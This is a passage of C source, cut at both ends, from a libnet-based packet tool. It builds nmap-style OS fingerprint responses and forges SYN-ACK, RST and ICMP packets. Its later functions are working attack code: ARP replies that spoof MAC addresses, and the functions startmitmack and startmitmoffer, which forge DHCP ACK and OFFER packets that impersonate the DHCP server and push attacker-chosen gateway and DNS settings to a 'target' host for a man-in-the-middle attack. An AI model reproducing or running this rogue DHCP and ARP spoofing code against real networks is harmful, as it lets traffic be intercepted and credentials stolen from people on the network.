                                strcpy(AVse[3].value, "S");
                        }
                        else if(tcp->th_ack == htonl(t5seq + 1)){
                                if(v>1)printf("ack +1 of sent seq\n");
                                acktype = ACKMATCHPLUS;
                                strcpy(AVse[3].value, "S++");
                        }
                        else if(tcp->th_ack == 0){
                                if(v>1)printf("ack = 0\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVse[3].value, "O");
                        }
                        else {
                                if(v>1)printf("ack != seq matches\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVse[3].value, "O");
                        }

                        //printf("Parse options\n\n");
			AVse[4].attribute = "Flags";
                        u = AVse[4].value;
                        if (tcp->th_flags & TH_BOG) *u++ = 'B';
                        if (tcp->th_flags & TH_URG) *u++ = 'U';
                        if (tcp->th_flags & TH_ACK) *u++ = 'A';
                        if (tcp->th_flags & TH_PUSH) *u++ = 'P';
                        if (tcp->th_flags & TH_RST) *u++ = 'R';
                        if (tcp->th_flags & TH_SYN) *u++ = 'S';
                        if (tcp->th_flags & TH_FIN) *u++ = 'F';
                        *u++ = '\0';

                        //ripped fromn nmap source.... originally ripped from linux source code ;)
                        AVse[5].attribute = "Ops";
                        p = AVse[5].value;
                        length = (TH_OFF(tcp) * 4) - sizeof(struct my_tcp);
                        q = ((char *)tcp) + sizeof(struct my_tcp);

                        while((length > 0) && ((p - AVse[5].value) < (int) sizeof(AVse[5].value) - 3)){
                                //printf("length %d, p - val %d, sizeof %d\n",length, p - AVsa[5].value, (int) sizeof(AVsa[5].value -3));
                                opcode=*q++;
                                length--;
                                if(!opcode){
                                        *p++ = 'L'; //End of list
                                        break;
                                }
                                else if (opcode == 1){
                                        *p++ = 'N'; //No Op
                                }
                                else if (opcode == 2){
                                        *p++ = 'M'; //MSS
                                        q++;
                                        memcpy(&tmpshort, q, 2);
                                        if(ntohs(tmpshort) == 265) *p++ = 'E'; //Echoed
                                        q += 2;
                                        length -= 3;
                                }
                                else if (opcode == 3) {
                                        *p++ = 'W'; //Window size
                                        q += 2;
                                        length -= 2;
                                }
                                else if (opcode == 8){
                                        *p++ = 'T'; //Timestamp
					q += 9;
                                        length -= 9;
                                }
                        }
                        *p++ = '\0';


			printf("T5(Resp=Y%%DF=%s%%W=%X%%ACK=%s%%Flags=%s%s%s%s%s%s%s%%Ops=%s)\n", df ? "Y" : "N", ntohs(tcp->th_win), acktype, bog ? "B" : "",  urg ? "U" : "", ack ? "A" : "", psh ? "P" : "", rst ? "R" : "", syn ? "S" : "", fin ? "F" : "", AVse[5].value );
			t5reply = 1;
			FPs[testcounter]->results = AVse;
			testcounter++;
		}
		
		if(t6){
			if(t6port != ntohs(tcp->th_dport)){
				if(v)printf("OS detect.... src port doesn't match\n");
				return(0);
			}
			
			if(!t6rec) t6rec = 1; 
			else return(0); //already recieved answered so return
			
			FPs[testcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));  
			FPs[testcounter]->name = "T6";
			
			AVsf = (struct AVal *) malloc(6 * sizeof(struct AVal));
                        AVsf[0].next = &AVsf[1];
                        AVsf[1].next = &AVsf[2];
                        AVsf[2].next = &AVsf[3];
                        AVsf[3].next = &AVsf[4];
                        AVsf[4].next = &AVsf[5];
                        AVsf[5].next = NULL;

                        AVsf[0].attribute = "Resp";
                        strcpy(AVsf[0].value, "Y");
                        AVsf[1].attribute = "DF";
                        if(df){
                                strcpy(AVsf[1].value, "Y");
                        }
                        else{
                                strcpy(AVsf[1].value, "N");
                        }

                        AVsf[2].attribute = "W";
                        sprintf(AVsf[2].value, "%hX", ntohs(tcp->th_win));

                        AVsf[3].attribute = "ACK";
                        if(tcp->th_ack == htonl(t6seq)){
                                if(v>1)printf("same ack as sent seq\n");
                                acktype = ACKMATCH;
                                strcpy(AVsf[3].value, "S");
                        }
                        else if(tcp->th_ack == htonl(t6seq + 1)){
                                if(v>1)printf("ack +1 of sent seq\n");
                                acktype = ACKMATCHPLUS;
                                strcpy(AVsf[3].value, "S++");
                        }
                        else if(tcp->th_ack == 0){
                                if(v>1)printf("ack = 0\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVsf[3].value, "O");
                        }
                        else {
                                if(v>1)printf("ack != seq matches\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVsf[3].value, "O");
                        }

                        //printf("Parse options\n\n");
			AVsf[4].attribute = "Flags";
                        u = AVsf[4].value;
                        if (tcp->th_flags & TH_BOG) *u++ = 'B';
                        if (tcp->th_flags & TH_URG) *u++ = 'U';
                        if (tcp->th_flags & TH_ACK) *u++ = 'A';
                        if (tcp->th_flags & TH_PUSH) *u++ = 'P';
                        if (tcp->th_flags & TH_RST) *u++ = 'R';
                        if (tcp->th_flags & TH_SYN) *u++ = 'S';
                        if (tcp->th_flags & TH_FIN) *u++ = 'F';
                        *u++ = '\0';

                        //ripped fromn nmap source.... originally ripped from linux source code ;)
                        AVsf[5].attribute = "Ops";
                        p = AVsf[5].value;
                        length = (TH_OFF(tcp) * 4) - sizeof(struct my_tcp);
                        q = ((char *)tcp) + sizeof(struct my_tcp);

                        while((length > 0) && ((p - AVsf[5].value) < (int) sizeof(AVsf[5].value) - 3)){
                                //printf("length %d, p - val %d, sizeof %d\n",length, p - AVsa[5].value, (int) sizeof(AVsa[5].value -3));
                                opcode=*q++;
                                length--;
                                if(!opcode){
                                        *p++ = 'L'; //End of list
                                        break;
                                }
                                else if (opcode == 1){
                                        *p++ = 'N'; //No Op
                                }
                                else if (opcode == 2){
                                        *p++ = 'M'; //MSS
                                        q++;
                                        memcpy(&tmpshort, q, 2);
                                        if(ntohs(tmpshort) == 265) *p++ = 'E'; //Echoed
                                        q += 2;
                                        length -= 3;
                                }
                                else if (opcode == 3) {
                                        *p++ = 'W'; //Window size
                                        q += 2;
                                        length -= 2;
                                }
                                else if (opcode == 8){
                                        *p++ = 'T'; //Timestamp
					q += 9;
                                        length -= 9;
                                }
                        }
                        *p++ = '\0';


			printf("T6(Resp=Y%%DF=%s%%W=%X%%ACK=%s%%Flags=%s%s%s%s%s%s%s%%Ops=%s)\n", df ? "Y" : "N", ntohs(tcp->th_win), acktype, bog ? "B" : "",  urg ? "U" : "", ack ? "A" : "", psh ? "P" : "", rst ? "R" : "", syn ? "S" : "", fin ? "F" : "", AVsf[5].value );
			t6reply = 1;
			FPs[testcounter]->results = AVsf;
			testcounter++;
		}
		
		if(t7){
			if(t7port != ntohs(tcp->th_dport)){
				if(v)printf("OS detect.... src port doesn't match\n");
				return(0);
			}
			
			if(!t7rec) t7rec = 1; 
			else return(0); //already recieved answered so return
			
			FPs[testcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));  
			FPs[testcounter]->name = "T7";
			AVsg = (struct AVal *) malloc(6 * sizeof(struct AVal));
                        AVsg[0].next = &AVsg[1];
                        AVsg[1].next = &AVsg[2];
                        AVsg[2].next = &AVsg[3];
                        AVsg[3].next = &AVsg[4];
                        AVsg[4].next = &AVsg[5];
                        AVsg[5].next = NULL;

                        AVsg[0].attribute = "Resp";
                        strcpy(AVsg[0].value, "Y");
                        AVsg[1].attribute = "DF";
                        if(df){
                                strcpy(AVsg[1].value, "Y");
                        }
                        else{
                                strcpy(AVsg[1].value, "N");
                        }

                        AVsg[2].attribute = "W";
                        sprintf(AVsg[2].value, "%hX", ntohs(tcp->th_win));

                        AVsg[3].attribute = "ACK";
                        if(tcp->th_ack == htonl(t7seq)){
                                if(v>1)printf("same ack as sent seq\n");
                                acktype = ACKMATCH;
                                strcpy(AVsg[3].value, "S");
                        }
                        else if(tcp->th_ack == htonl(t7seq + 1)){
                                if(v>1)printf("ack +1 of sent seq\n");
                                acktype = ACKMATCHPLUS;
                                strcpy(AVsg[3].value, "S++");
                        }
                        else if(tcp->th_ack == 0){
                                if(v>1)printf("ack = 0\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVsg[3].value, "O");
                        }
                        else {
                                if(v>1)printf("ack != seq matches\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVsg[3].value, "O");
                        }

                        //printf("Parse options\n\n");
			AVsg[4].attribute = "Flags";
                        u = AVsg[4].value;
                        if (tcp->th_flags & TH_BOG) *u++ = 'B';
                        if (tcp->th_flags & TH_URG) *u++ = 'U';
                        if (tcp->th_flags & TH_ACK) *u++ = 'A';
                        if (tcp->th_flags & TH_PUSH) *u++ = 'P';
                        if (tcp->th_flags & TH_RST) *u++ = 'R';
                        if (tcp->th_flags & TH_SYN) *u++ = 'S';
                        if (tcp->th_flags & TH_FIN) *u++ = 'F';
                        *u++ = '\0';

                        //ripped fromn nmap source.... originally ripped from linux source code ;)
                        AVsg[5].attribute = "Ops";
                        p = AVsg[5].value;
                        length = (TH_OFF(tcp) * 4) - sizeof(struct my_tcp);
                        q = ((char *)tcp) + sizeof(struct my_tcp);

                        while((length > 0) && ((p - AVsg[5].value) < (int) sizeof(AVsg[5].value) - 3)){
                                //printf("length %d, p - val %d, sizeof %d\n",length, p - AVsa[5].value, (int) sizeof(AVsa[5].value -3));
                                opcode=*q++;
                                length--;
                                if(!opcode){
                                        *p++ = 'L'; //End of list
                                        break;
                                }
                                else if (opcode == 1){
                                        *p++ = 'N'; //No Op
                                }
                                else if (opcode == 2){
                                        *p++ = 'M'; //MSS
                                        q++;
                                        memcpy(&tmpshort, q, 2);
                                        if(ntohs(tmpshort) == 265) *p++ = 'E'; //Echoed
                                        q += 2;
                                        length -= 3;
                                }
                                else if (opcode == 3) {
                                        *p++ = 'W'; //Window size
                                        q += 2;
                                        length -= 2;
                                }
                                else if (opcode == 8){
                                        *p++ = 'T'; //Timestamp
			                 q += 9;
                                        length -= 9;
                                }
                        }
                        *p++ = '\0';


			printf("T7(Resp=Y%%DF=%s%%W=%X%%ACK=%s%%Flags=%s%s%s%s%s%s%s%%Ops=%s)\n", df ? "Y" : "N", ntohs(tcp->th_win), acktype, bog ? "B" : "",  urg ? "U" : "", ack ? "A" : "", psh ? "P" : "", rst ? "R" : "", syn ? "S" : "", fin ? "F" : "", AVsg[5].value );
			t7reply = 1;
			FPs[testcounter]->results = AVsg;
			testcounter++;
		}
		
		if(syn && ack){
			if(sendrst(RSTOPEN) != 0){
				printf("Opps: sendrst failed\n");
			}
		}
	}

	else {
		return(0);
	}
	return(0);
}

u_int8_t sendicmpportunreach(void)
{
	Packet *tsd;
	struct ether_header *ether;
	struct my_ip *ip;
	struct my_udp *udp;
	libnet_ptag_t t;
	int c;
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	ether = (struct ether_header *)(tsd->pkt);
	ip = (struct my_ip *)(tsd->pkt + sizeof(struct ether_header));
	udp = (struct my_udp *)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip));

	if(pthread_mutex_lock(&packetlock) != 0){
		printf("Opps: pthread_mutex_lock (send syn ack) error\n");
		exit(1);
	}

	t = libnet_build_icmpv4_unreach(
			3,	//type 3 = destunation unavailable
			3,	//code 3 = port unreachable
			0,	//checksum
			ip->ip_len,
			ip->ip_tos,
			ip->ip_id,
			ip->ip_off,
			ip->ip_ttl,
			ip->ip_p,
			ip->ip_sum,
			ip->ip_src,
			ip->ip_dst,
			(u_char *) udp, //payload
			sizeof(struct my_udp),  //payload size
			l,
			0);
	if(t == -1){
		printf("Opps: libnet_build_icmpv4_unreach error as %s\n\n", libnet_geterror(l));
		exit(1);
	}
	
	t = libnet_build_ipv4(
			LIBNET_TCP_H + LIBNET_IPV4_H, //length
			0,	//tos
			libnet_get_prand(LIBNET_PRu16),	// 0 //ip->ip_id, //id
			0,	//ip frag
			GOBTTL,	//TTL
			IPPROTO_ICMP, //protocol
			0,	//checksum
			ip->ip_dst,	//srcip
			ip->ip_src,	//dstip
			NULL,	//payload
			0,	//payload size
			l,	//libnet handle
			0);	//libnet_id
		if(t == -1){
		printf("Opps: libnet_build_ipv4 error as %s\n\n", libnet_geterror(l));
		exit(1);
	}

	t = libnet_build_ethernet(
			ether->ether_shost,	//dst mac
			ether->ether_dhost,	//src mac
			ETHERTYPE_IP,
			NULL,
			0,
			l,
			0);
	if(t == -1){
		printf("Opps: libnet_build_ethernet as %s\n\n", libnet_geterror(l));
		exit(1);
	}

	c = libnet_write(l);
	if(c == -1){
		printf("Opps: libnet_write error (send SYN ACK) as %s\n", libnet_geterror(l));
		exit(1);
	}
	libnet_stats(l, &gs);
	libnet_clear_packet(l);

	if(pthread_mutex_unlock(&packetlock) != 0){
		printf("Opps: pthread_mutex_unlock (send SYN ACK) error\n");
		exit(1);
	}
	return(0);
}
u_int8_t sendsynack(void)
{
	
	Packet *tsd;
	struct ether_header *ether;
	struct my_ip *ip;
	struct my_tcp *tcp;
	libnet_ptag_t t;
	int c;
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	ether = (struct ether_header *)(tsd->pkt);
	ip = (struct my_ip *)(tsd->pkt + sizeof(struct ether_header));
	tcp = (struct my_tcp *)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip));
			
	if(pthread_mutex_lock(&packetlock) != 0){
		printf("Opps: pthread_mutex_lock (send syn ack) error\n");
		exit(1);
	}
	t = libnet_build_tcp(
			ntohs(tcp->th_dport),	//srcport
			ntohs(tcp->th_sport), 	//dstport
			libnet_get_prand(LIBNET_PRu32),	//seq number
			ntohl(tcp->th_seq) + 1,	//ack + 1
			TH_SYN + TH_ACK,		//SYN ACK flag
			GOB_WIN_SIZE,		//window size
			0,		//checksum
			0,		//urg pointer
			LIBNET_TCP_H,	//packet size
			NULL,		//payload
			0,
			l,
			0);
	if(t == -1){
		printf("Opps: libnet_build_tcp error as %s\n\n", libnet_geterror(l));
		exit(1);
	}
	t = libnet_build_ipv4(
			LIBNET_TCP_H + LIBNET_IPV4_H, //length
			0,	//tos
			libnet_get_prand(LIBNET_PRu16),	// 0 //ip->ip_id, //id
			0,	//ip frag
			GOBTTL,	//TTL
			IPPROTO_TCP, //protocol
			0,	//checksum
			ip->ip_dst,	//srcip
			ip->ip_src,	//dstip
			NULL,	//payload
			0,	//payload size
			l,	//libnet handle
			0);	//libnet_id
		if(t == -1){
		printf("Opps: libnet_build_ipv4 error as %s\n\n", libnet_geterror(l));
		exit(1);
	}

	t = libnet_build_ethernet(
			ether->ether_shost,	//dst mac
			ether->ether_dhost,	//src mac
			ETHERTYPE_IP,
			NULL,
			0,
			l,
			0);
	if(t == -1){
		printf("Opps: libnet_build_ethernet as %s\n\n", libnet_geterror(l));
		exit(1);
	}

	c = libnet_write(l);
	if(c == -1){
		printf("Opps: libnet_write error (send SYN ACK) as %s\n", libnet_geterror(l));
		exit(1);
	}
	libnet_stats(l, &gs);
	libnet_clear_packet(l);
	
	if(pthread_mutex_unlock(&packetlock) != 0){
		printf("Opps: pthread_mutex_unlock (send SYN ACK) error\n");
		exit(1);
	}
	printf("Sent SYN ACK to create connection\n");
	//TODO add this to a linked list and wait 4 an ack
	
	return(0);

}
u_int8_t sendrst(int type)
{
	
	Packet *tsd;
	struct ether_header *ether;
	struct my_ip *ip;
	struct my_tcp *tcp;
	libnet_ptag_t t;
	int c;
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	ether = (struct ether_header *)(tsd->pkt);
	ip = (struct my_ip *)(tsd->pkt + sizeof(struct ether_header));
	tcp = (struct my_tcp *)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip));
				
	if(pthread_mutex_lock(&packetlock) != 0){
		printf("Opps: pthread_mutex_lock (send rst) error\n");
		exit(1);
	}

	//printf("old ack = %d old seq = %d sending ack = %d\n", ntohl(tcp->th_ack), ntohl(tcp->th_seq), ntohl(tcp->th_seq)+1);
	if(type == RSTOPEN){
		//open port found send rst
		t = libnet_build_tcp(
			ntohs(tcp->th_dport),	//srcport
			ntohs(tcp->th_sport), 	//dstport
	 		ntohl(tcp->th_ack),	//seq number
			0,		//ack number
			TH_RST,		//rst flag
			0,		//window size
			0,		//checksum
			0,		//urg pointer
			LIBNET_TCP_H,	//packet size
			NULL,		//payload
			0,
			l,
			0);
	}
	else {
		//RSTCLOSED
		//incoming connection send reset
		t = libnet_build_tcp(
			ntohs(tcp->th_dport),	//srcport
			ntohs(tcp->th_sport), 	//dstport
		 	0, 			//seq number
			ntohl(tcp->th_seq) + 1,		//ack number
			TH_RST + TH_ACK,	//rst ack flag
			0,		//window size
			0,		//checksum
			0,		//urg pointer
			LIBNET_TCP_H,	//packet size
			NULL,		//payload
			0,
			l,
			0);
	}

	if(t == -1){
		printf("Opps: libnet_build_tcp error as %s\n\n", libnet_geterror(l));
		exit(1);
	}

	t = libnet_build_ipv4(
			LIBNET_TCP_H + LIBNET_IPV4_H, //length
			0,	//tos
			0,	//ip->ip_id,	//id
			0,	//ip frag
			GOBTTL,	//TTL
			IPPROTO_TCP, //protocol
			0,	//checksum
			ip->ip_dst,	//srcip
			ip->ip_src,	//dstip
			NULL,	//payload
			0,	//payload size
			l,	//libnet handle
			0);	//libnet_id
		if(t == -1){
		printf("Opps: libnet_build_ipv4 error as %s\n\n", libnet_geterror(l));
		exit(1);
	}

	t = libnet_build_ethernet(
			ether->ether_shost,	//dst mac
			ether->ether_dhost,	//src mac
			ETHERTYPE_IP,
			NULL,
			0,
			l,
			0);
	if(t == -1){
		printf("Opps: libnet_build_ethernet as %s\n\n", libnet_geterror(l));
		exit(1);
	}

	c = libnet_write(l);
	if(c == -1){
		printf("Opps: libnet_write error (send rst) as %s\n", libnet_geterror(l));
		exit(1);
	}
	libnet_stats(l, &gs);
	libnet_clear_packet(l);
	
	if(pthread_mutex_unlock(&packetlock) != 0){
		printf("Opps: pthread_mutex_unlock (send rst) error\n");
		exit(1);
	}
	if(v)printf("Reset sent\n");
	return(0);
}

int startARPreply(const unsigned int rip)
{
	void addstats(struct libnet_stats);

	libnet_ptag_t t;
	u_char enet_src[6];
	u_char enet_dst[6];
	u_char dstip[4];
	unsigned int riptemp;
	unsigned char *sip;
	PMT p_curr, p_top;
	struct my_arpops *arpo;
	struct my_arp *arp;
	Packet *tsd;
	int c,x,y,z;
	u_char *packet;
	u_long packet_s;

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	arp = (struct my_arp *)(tsd->pkt + sizeof(struct ether_header));
	arpo = (struct my_arpops *)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_arp));
	
	riptemp = ntohl(rip);

	p_curr = p_top = mtpoint;
	if(p_curr == NULL){
	//	printf("Opps: pthread_mutex_unlock (arp reply ll) error\n");
	//		exit(1);
		return(0);
	}
	while((p_curr != NULL) && (p_curr->ipaddress != riptemp)){
		p_curr = (PMT) p_curr->nextmt;
	}
	if(p_curr == NULL){
		//printf("Not found in list\n");
		return(0);
	}
	else{
		//found
		for(x=0; x<6; x++){
			enet_src[x] = p_curr->srcmac[x];
			
		}
		for(y=0; y<6; y++){
			enet_dst[y] = arpo->ar_sha[y];
		}
		for(z=0; z<4; z++){
			dstip[z] = arpo->ar_spa[z];
		}

		sip = (unsigned char *)&arpo->ar_tpa;//->ipaddress;//riptemp;
		
		if(pthread_mutex_lock(&packetlock) != 0){
			printf("Opps: pthread_mutex_lock (arp reply) error\n");
			exit(1);
		}

		t = libnet_build_arp(
				ARPHRD_ETHER, 	//HWTYPE
				ETHERTYPE_IP, 	//Proto
				6,		//Hsize
				4,		//Psize
				ARPOP_REPLY,	//opcode
				enet_src,	//send src mac
				sip,		//sender src ip
				enet_dst,	//dst mac
				dstip,		//dst ip
				NULL,		//payload
				0,		//sizeof payload
				q,		//libnet handle
				0);		//libnet id;
		if(t == -1){
			printf("Opps: Can't build ARP header as %s\n\n", libnet_geterror(q));
			libnet_clear_packet(q);
			exit(1);
		
		}
	
		t = libnet_build_ethernet(
				enet_dst,       //enet dst
				enet_src,       //enet src
				ETHERTYPE_ARP,  //proto addr
				NULL,           //payload
				0,              //payload size
				q,              //libnet handle
				0);             //libnet id
		if(t == -1){
			printf("Opps: Can;t build ethernet header as %s\n\n", libnet_geterror(q));
			libnet_clear_packet(q);
			exit(1);
		}
		
		
		c = libnet_adv_cull_packet(q, &packet, &packet_s);
		if(c == -1){
			printf("Opps: libnet_adv_cull error as %s\n",libnet_geterror(q));
			exit(1);
		}
			
		
		c = libnet_write(q);
		if(c == -1){
			printf("Opps: libnet_write error (arp reply) as %s\n", libnet_geterror(q));
			libnet_clear_packet(q);
		}

		libnet_stats(q, &gs);
		libnet_clear_packet(q);
		if(pthread_mutex_unlock(&packetlock) != 0){
			printf("Opps: pthread_mutex_unlock (arp reply) error\n");
			exit(1);
		}
	if(v)printf("\nsent arp reply\n");
		return(0);
	}
	return(0); //shouldn't reach here
}
	
int startmitmack(void)
{
	libnet_ptag_t t;
	libnet_ptag_t ip;
	libnet_ptag_t udp;
	libnet_ptag_t dhcp;
	PMT p_curr;
	u_char *options;
	u_long options_len;
	u_char *target;
	u_char *server;
	u_char *dns;
	u_char *gateway;
	//u_char *subnet;
	int i, a;
	Packet *tsd;
	struct ether_header *ether;
	struct my_ip *iph;
	struct my_dhcp *dhcph;
	extern u_int32_t convert32(char *, int , int, int, int);
	
	u_char *tid;
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	ether = (struct ether_header *)(tsd->pkt);
	iph = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	dhcph = (struct my_dhcp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));

	
	p_curr = mtpoint;
	if(p_curr == NULL){
		printf("Opps: ll is empty\n");
		exit(1);
	}

	while((p_curr != NULL) && (p_curr->type != TARGET)){
		p_curr = (PMT) p_curr->nextmt;
	}

	if(p_curr == NULL){
		printf("Opps: Couldn't find target in ll\n");
		exit(1);
	}
	
	target = (u_char *)&p_curr->ipaddress;
	//subnet = (u_char *)&p_curr->subnetmask;
	printf("DHCP Acking target %d.%d.%d.%d subnet mask %d.%d.%d.%d\n", target[0], target[1], target[2], target[3], subneta, subnetb, subnetc, subnetd);

	
	p_curr = mtpoint;
	if(p_curr == NULL){
		printf("Opps: ll is empty\n");
		exit(1);
	}

	while((p_curr != NULL) && (p_curr->type != DHCPSERVER)){
		p_curr = (PMT) p_curr->nextmt;
	}

	if(p_curr == NULL){
		printf("Opps: Couldn't find target in ll\n");
		exit(1);
	}
	server = (u_char *)&p_curr->ipaddress;
	printf("server %d.%d.%d.%d\n", server[0], server[1], server[2], server[3]);

	
	p_curr = mtpoint;
	if(p_curr == NULL){
		printf("Opps: ll is empty\n");
		exit(1);
	}

	while((p_curr != NULL) && (p_curr->type != DNS)){
		p_curr = (PMT) p_curr->nextmt;
	}

	if(p_curr == NULL){
		printf("Opps: Couldn't find target in ll\n");
		exit(1);
	}
	dns = (u_char *)&p_curr->ipaddress;
	printf("dns %d.%d.%d.%d\n", dns[0], dns[1], dns[2], dns[3]);

	
	if(mitmsubnet){
		p_curr = mtpoint;
		if(p_curr == NULL){
			printf("Opps: ll is empty\n");
			exit(1);
		}

		while((p_curr != NULL) && (p_curr->type != GATEWAY)){
			p_curr = (PMT) p_curr->nextmt;
		}

		if(p_curr == NULL){
			printf("Opps: Couldn't find target in ll\n");
			exit(1);
		}
		gateway = (u_char *)&p_curr->ipaddress;
		printf("gateway %d.%d.%d.%d\n", gateway[0], gateway[1], gateway[2], gateway[3]);
	}
	else {
		printf("gateway %d.%d.%d.%d\n", gatewaya, gatewayb, gatewayc, gatewayd);
	}
	
	i = 0;
	options = malloc(61 * sizeof(unsigned char)); //orig size 45
	options[i++] = LIBNET_DHCP_MESSAGETYPE;
	options[i++] = 1;
	options[i++] = 0x05; //LIBNET_DHCP_ACKa
	
	options[i++] = 0x36; //server identifier
	options[i++] = 0x04; //size
	options[i++] = (u_int8_t) server[0]; 
	options[i++] = (u_int8_t) server[1];
	options[i++] = (u_int8_t) server[2];
	options[i++] = (u_int8_t) server[3];
	
	options[i++] = 0x33; //lease time
	options[i++] = 0x04; //size
	options[i++] = 0x00;
	options[i++] = 0x00;
	options[i++] = 0xa8; //2 hours
	options[i++] = 0xc0;
	
	options[i++] = 0x3a; //renewal time
	options[i++] = 0x04; //size
	options[i++] = 0x00;
	options[i++] = 0x00;
	options[i++] = 0x54;
	options[i++] = 0x60;
	
	options[i++] = 0x3b; //rebind time
	options[i++] = 0x04; //size
	options[i++] = 0x00;
	options[i++] = 0x00;
	options[i++] = 0x93;
	options[i++] = 0xa8;

	options[i++] = 0x01; //subnet mask
	options[i++] = 0x04; //size
	options[i++] = subneta; 
	options[i++] = subnetb;
	options[i++] = subnetc;
	options[i++] = subnetd;

	if(mitmsubnet){
		options[i++] = 0x03; //default router
		options[i++] = 0x04; //size
		options[i++] = (u_int8_t) gateway[0];
		options[i++] = (u_int8_t) gateway[1];
		options[i++] = (u_int8_t) gateway[2];
		options[i++] = (u_int8_t) gateway[3];
	}

	else if(mitmdns){
		options[i++] = 0x03; //default router
		options[i++] = 0x04; //size
		options[i++] = gatewaya;
		options[i++] = gatewayb;
		options[i++] = gatewayc;
		options[i++] = gatewayd;
	}
	
	else {
		printf("Opps: only subnet or dns allowed atm\n");
		exit(1);
	}
	
	options[i++] = 0x06; //DNS SERVER
	options[i++] = 0x04; //size
	options[i++] = dns[0];
	options[i++] = dns[1];
	options[i++] = dns[2];
	options[i++] = dns[3];
	options[i++] = LIBNET_DHCP_END;
	for(a=0;a<15;a++){
		options[i++] = 0x00;
	}
	
	options_len = i; //that should work :)
	printf("options_len = %ld\n", options_len);
	if(pthread_mutex_lock(&packetlock) != 0){
		printf("Opps: pthread_mutex_lock (dhcp ack) error\n");
		exit(1);
	}
	
	tid = (u_char*)&dhcph->trans_id;
	printf("transid %.2x %.2x %.2x %.2x\n",tid[0], tid[1], tid[2], tid[3]);

	dhcp = libnet_build_dhcpv4(
		LIBNET_DHCP_REPLY,
		1,
		6,
		0,
		ntohl(dhcph->trans_id),
		0,
		0x8000,
		0,
		convert32(target, 0, 1, 2, 3), //offered IP
		convert32(server, 0,1,2,3), //server ip
		0, //relay
		ether->ether_shost, //client mac
		NULL,
		NULL,
		options,
		options_len,
		l,
		0);
	if(dhcp == -1){
		printf("Opps: DHCP build error as %s\n", libnet_geterror(l));
	}

	udp = libnet_build_udp(
                 67,                     //source port
		 68,                     //dst port
		 LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, //packetsize
		 0,                      //checksum
		 NULL,                   //payload
		 0,                      //payload length
		 l,                      //libnet handle
		 0);                     //libnet id
	if(udp == -1){
		printf("Opps: Couldn't build udp packet as %s\n", libnet_geterror(l));
		exit(1);
	}

	ip = libnet_build_ipv4(
		LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, //length
		0x10,                   //tos
		0,                      //IP ID
		0,                      //IP Frag
		GOBTTL,                 //TTL
		IPPROTO_UDP,            //protocol
		0,                      //checksum
		ntohl(convert32(server,0,1,2,3)),	      //source ip 0.0.0.0
		-1,                     //inet_addr("255.255.255.255") //dest ip
		NULL,                   //payload
		0,                      //length of payload
		l,                      //libnet handle
		0);                     //libnet id
	if(ip == -1){
		printf("Opps: Couldn't build ip packet as %s\n", libnet_geterror(l));
		exit(1);
	}
			  
	t = libnet_build_ethernet(
		ether->ether_shost,               //enet_dst
		p_curr->srcmac,               //ethaddr.ether_addr_octet, //enet_src
		ETHERTYPE_IP,           //protocol type
		NULL,                   //payload
		0,                      //payload length
		l,                      //libnet handle
		0);                     //libnet id
	if(t == -1){
		printf("Opps: Couldn't build ethernet frame as %s\n", libnet_geterror(l));
		exit(1);
	}
					  
	if(libnet_write(l) == -1){
		printf("Opps: libnet_write error (dhcp ack) as %s\n", libnet_geterror(l));
		exit(1);
	}
	
	libnet_stats(l, &gs);
	libnet_clear_packet(l);
	if(pthread_mutex_unlock(&packetlock) != 0){
		printf("Opps: pthread_mutex_unlock (dhcp ack) error\n");
		exit(1);
	}

	free(options);
	return(0);

}


int startmitmoffer(void)
{
	libnet_ptag_t t;
	libnet_ptag_t ip;
	libnet_ptag_t udp;
	libnet_ptag_t dhcp;
	PMT p_curr;
	u_char *options;
	u_long options_len;
	u_char *target;
	u_char *server;
	u_char *dns;
	u_char *gateway;
	//u_char *subnet;
	int i, a;
	Packet *tsd;
	struct ether_header *ether;
	struct my_ip *iph;
	struct my_dhcp *dhcph;
	extern u_int32_t convert32(char *, int , int, int, int);
	
	u_char *tid;
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	ether = (struct ether_header *)(tsd->pkt);
	iph = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	dhcph = (struct my_dhcp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));

	
	p_curr = mtpoint;
	if(p_curr == NULL){
		printf("Opps: ll is empty\n");
		exit(1);
	}

	while((p_curr != NULL) && (p_curr->type != TARGET)){
		p_curr = (PMT) p_curr->nextmt;
	}

	if(p_curr == NULL){
		printf("Opps: Couldn't find target in ll\n");
		exit(1);
	}
	
	target = (u_char *)&p_curr->ipaddress;
	//subnet = (u_char *)&p_curr->subnetmask;
	printf("target %d.%d.%d.%d subnet %d.%d.%d.%d\n", target[0], target[1], target[2], target[3], subneta, subnetb, subnetc, subnetd);

	
	
	p_curr = mtpoint;
	if(p_curr == NULL){
		printf("Opps: ll is empty\n");
		exit(1);
	}

	while((p_curr != NULL) && (p_curr->type != DHCPSERVER)){
		p_curr = (PMT) p_curr->nextmt;
	}

	if(p_curr == NULL){
		printf("Opps: Couldn't find target in ll\n");
